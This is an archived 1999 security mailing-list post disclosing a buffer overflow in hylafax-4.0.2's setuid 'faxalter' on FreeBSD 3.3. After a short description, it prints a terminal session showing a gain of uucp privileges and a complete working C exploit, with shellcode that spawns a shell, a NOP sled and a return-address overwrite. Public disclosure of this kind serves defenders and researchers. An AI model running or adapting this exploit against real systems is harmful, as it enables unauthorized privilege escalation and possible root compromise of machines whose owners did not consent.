hylafax-4.0.2 local exploit

From: Tellier, Brock (btellierat_private)
Date: Wed Nov 03 1999 - 21:09:35 PST

Next message: Ussr Labs: "Remote DoS Attack in BFTelnet Server v1.1 for Windows NT"

Previous message: devbugsat_private: "Re: Mac OS 9 Idle Lock Bug"
Next in thread: Thomas Biege: "Re: hylafax-4.0.2 local exploit"
Reply: Thomas Biege: "Re: hylafax-4.0.2 local exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Greetings,

OVERVIEW
A vulnerability exists in "faxalter", part of the hylafax-4.0.2 package
which will allow any user gain uucp and possibly root privs.

BACKGROUND
My tests were done only on FreeBSD 3.3-RELEASE which includes the
hylafax
package as an "additional package" on the install CD.  Of course,
hylafax
runs on many different platforms thus anyone running hylafax should
check out his or her version for this vulnerability.

DETAILS
The faxalter program is installed suid-uucp by default when installed
from the FreeBSD-3.3 CD hylafax package.  This program is contains a
buffer overflow which will allow any user to gain uucp privs.  This
could become a root-compromise considering that uucp has write access
to several programs (such as minicom, cu and ecu on FreeBSD 3.3) and
could potentially trojan these programs.  In addition to this, the
suid-root "hfaxd" program reads/writes to several uucp-owned files.
At the very least, a malicious user could intercept all faxes, uucp
transmitions and be generally annoying.

EXPLOIT
bash-2.03$ uname -a; ls -la `which faxalter`; id
FreeBSD  3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT
1999
         jkhat_private:/usr/src/sys/compile/GENERIC  i386
-r-sr-xr-x  1 uucp  bin  72332 Sep 11 03:32 /usr/local/bin/faxalter
uid=1000(xnec) gid=1000(xnec) groups=1000(xnec), 0(wheel)
bash-2.03$ /home/xnec/faxalterx
$ id
uid=1000(xnec) euid=66(uucp) gid=1000(xnec) groups=1000(xnec), 0(wheel)
$

/*
 * Faxalter exploit for FreeBSD 3.3/hylafax-4.0.2 yields euid=66(uucp)
 * Brock Tellier btellierat_private
 */

#include <stdio.h>

char shell[]= /* mudgeat_private */
   "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
   "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
   "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
   "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";


main (int argc, char *argv[] ) {
 int x = 0;
 int y = 0;
 int offset = 0;
 int bsize = 4093; /* overflowed buf's bytes + 4(ebp) + 4(eip) + 1 */
 char buf[bsize];
 int eip = 0xbfbfcfad;

 if (argv[1]) {
   offset = atoi(argv[1]);
   eip = eip + offset;
 }
 fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);

 for ( x = 0; x < 4021; x++) buf[x] = 0x90;
     fprintf(stderr, "NOPs to %d\n", x);

 for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
     fprintf(stderr, "Shellcode to %d\n",x);

  buf[x++] = eip & 0x000000ff;
  buf[x++] = (eip & 0x0000ff00) >> 8;
  buf[x++] = (eip & 0x00ff0000) >> 16;
  buf[x++] = (eip & 0xff000000) >> 24;
     fprintf(stderr, "eip to %d\n",x);

 buf[bsize - 1]='\0';

 execl("/usr/local/bin/faxalter", "faxalter", "-m", buf, NULL);

}

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA

Next message: Ussr Labs: "Remote DoS Attack in BFTelnet Server v1.1 for Windows NT"
Previous message: devbugsat_private: "Re: Mac OS 9 Idle Lock Bug"
Next in thread: Thomas Biege: "Re: hylafax-4.0.2 local exploit"
Reply: Thomas Biege: "Re: hylafax-4.0.2 local exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:09:36 PDT